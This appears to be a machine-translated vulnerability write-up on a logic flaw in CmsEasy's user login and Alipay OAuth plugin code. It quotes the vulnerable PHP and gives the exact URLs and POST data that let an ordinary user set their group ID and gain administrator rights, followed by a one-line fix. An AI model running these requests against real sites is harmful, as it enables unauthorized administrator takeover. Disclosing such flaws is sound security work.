Cmseasy logical defects can be upgraded to an administrator for common users (is shell still difficult)

Cmseasy logical defects can be upgraded to an administrator for common users (is shell still difficult)

Cmseasy logical defects can be upgraded to administrator for common users

User_act.php (130-155 ):

if (front::post('submit')) {            if (front::post('username') && front::post('password')) {                $username = front::post('username');                $password = md5(front::post('password'));                $data = array(                    'username' => $username,                    'password' => $password,                );                $user = new user();                $row = $user->getrow(array('username' => $data['username'], 'password' => $data['password']));                if (!is_array($row)) {                    $this->login_false();                    return;                }                $post[$classname] = session::get('openid');                $this->_user->rec_update($post, 'userid=' . $row['userid']);                cookie::set('login_username', $row['username']);                cookie::set('login_password', front::cookie_encode($row['password']));                session::set('username', $row['username']);                front::redirect(url::create('user'));                return;            } else {                $this->login_false();                return;            }        }

Step 1: register a user with the test password of 111111.

Then send the url:

Http: // localhost/uploads/index. php? Case = user & act = respond & ologin_code = groupid

Postdata:

Username = test & password = 111111 & submit = xxx

Step 2:

$ Post [$ classname] = session: get ('openid ');

Here we passed the groupid to $ post, but there is a problem session: get ('openid') does not exist. Therefore, after execution, the groupid of the test user is 0.

Next, we are looking for more information.

Line 157-172:

include_once ROOT.'/lib/plugins/ologin/'.$classname.'.php';        $ologinobj = new $classname();        $status = $ologinobj->respond();        //var_dump(session::get('openid'));exit;        $where[$classname] = session::get('openid');        if(!$where[$classname]) front::redirect(url::create('user'));        $user = new user();        $data = $user->getrow($where);        if(!$data){            $this->view->data = $status;        }else{            cookie::set('login_username',$data['username']);            cookie::set('login_password',front::cookie_encode($data['password']));            session::set('username',$data['username']);            front::redirect(url::create('user'));        }

Here, let's see if we want to write other session authentication information. We ignore it. We only care that the openid here is not controllable.

When $ classname is alipaylogin. php

Function respond () {ini_set ("display_errors", "On"); $ where = array ('login _ Code' => front :: $ get ['login _ Code']); $ ologins = ologin: getInstance ()-> getrows ($ where ); $ ologin = unserialize_config ($ ologins [0] ['ologin _ config']); // var_dump ($ ologin ); $ aliapy_config ['partner'] = $ ologin ['alipaylogin _ id']; $ aliapy_config ['key'] = $ ologin ['alipaylogin _ key']; $ aliapy_config ['Return _ url'] = ologin: url (basename (_ FILE __,'. php '); $ aliapy_config ['sign _ type'] = 'md5'; $ aliapy_config ['input _ charset'] = 'utf-8 '; $ aliapy_config ['Transport '] = 'http'; $ aliapy_config ['cacert'] = getcwd (). '/lib/plugins/alipayauth/cacert. pem'; // var_dump ($ aliapy_config); unset ($ _ GET ['case']); unset ($ _ GET ['ac']); unset ($ _ GET ['login _ Code']); unset ($ _ GET ['SITE']); require_once ("alipayauth/alipay_policy.class.php "); $ scheme = new alipayNotify ($ aliapy_config); // var_dump ($ AlipayNotify); $ verify_result = $ alipayaypolicy-> verifyReturn (); // var_dump ($ verify_result ); if (true | $ verify_result) {// Verification Successful $ user_id = front: $ get ['user _ id']; $ token = front :: $ get ['Token']; session: set ('Access _ token', $ token); session: set ("openid", $ user_id ); return array ('nickname' => front: get ('real _ name '));

If (true | $ verify_result) {// verify the success of this line so that it will always be true because before this is all about configuration information

Let's take a look at this.

$user_id = front::$get['user_id'];            $token = front::$get['token'];            session::set('access_token',$token);            session::set("openid",$user_id);            return array('nickname'=>  front::get('real_name'))

It is found that no openid is fully controllable

Url:

Http: // localhost/uploads/index. php? Case = user & act = respond & ologin_code = alipaylogin & user_id = 2 & real_name = test



At this time, our openid is set to 2





Let's look back.



Sending url:

Http: // localhost/uploads/index. php? Case = user & act = respond & ologin_code = groupid



Postdata:

Username = test & password = 111111 & submit = xxx



Now let's take a look at our test user group:
 

Let's log on to the background to see


 

 

Solution:

Enhanced Filtering